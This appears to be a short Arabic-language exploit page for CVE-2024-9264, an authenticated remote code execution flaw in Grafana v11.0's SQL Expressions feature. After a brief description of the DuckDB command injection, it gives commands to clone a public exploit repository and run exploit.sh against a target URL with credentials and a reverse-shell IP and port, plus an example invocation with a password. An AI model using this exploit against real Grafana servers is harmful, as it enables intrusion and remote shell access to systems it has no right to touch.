
RCE مُصادَق عليه في Grafana (v11.0) عبر SQL Expressions - استغلال PoC
استغلال RCE مُوثَّق في Grafana (v11.0) عبر SQL Expressions - استغلال PoC
CVE-2024-9264 - Grafana v11.0
تنفيذ الأكواد عن بُعد معتمد الهوية (RCE)
PoC
CVE-2024-9264 هو ثغرة حرجة من نوع تنفيذ الأكواد عن بُعد وتضمين الملفات المحلية، أُدخلت في ميزة "SQL Expressions" التجريبية في Grafana 11. تمرّر الواجهة البرمجية استعلامات SQL المقدمة من المستخدم مباشرةً إلى واجهة أوامر DuckDB دون تعقيمٍ كافٍ، لذا يمكن لأي حساب مصادق بصلاحيات Viewer أو أعلى حقن أوامر الصدفة أو قراءة ملفات عشوائية، بشرط أن يكون ملف duckdb الثنائي في PATH الخاص بالخادم.
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh
# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>
مثال:
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337